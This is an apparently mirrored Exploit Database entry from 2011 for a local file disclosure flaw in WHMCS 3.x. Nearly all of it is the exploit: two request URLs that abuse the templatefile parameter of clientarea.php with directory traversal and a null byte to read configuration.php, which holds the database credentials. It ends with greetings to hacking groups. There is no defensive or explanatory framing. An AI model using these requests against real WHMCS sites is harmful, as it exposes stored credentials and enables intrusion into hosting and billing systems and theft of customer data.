WHMCompleteSolution (WHMCS) 3.x – ‘clientarea.php’ Local File Disclosure

• Exploit Database
• 13 阅读

• 作者： red virus
  日期： 2011-11-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18081/

• # Title: WHMCS (clientarea.php) Local File Disclosure
  
  # Author : Red Virus >>>c3o@w.cn
  
  # Product: WHMCS ( WHMCompleteSolution )
  # Vendor : http://whmcs.com/
  # Date : 11/04/2011
  # Version: 3.X.x
  # Tested on: linux+apache
  # Homepage : www.alm3refh.com 
  ================================================================
  
   
  http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00
   
  http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00
   
  show the page source to see Disclosure file
   
  
  ================================================================
  
  Greetz To .
   >>> alm3refh.com - tryag.cc - joood
  T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 
  infofst & virus hima & Karar aLShaMi& all alm3refh group
  ahwak2000 & reno & amr2006 & b0x & ZombiE_KsA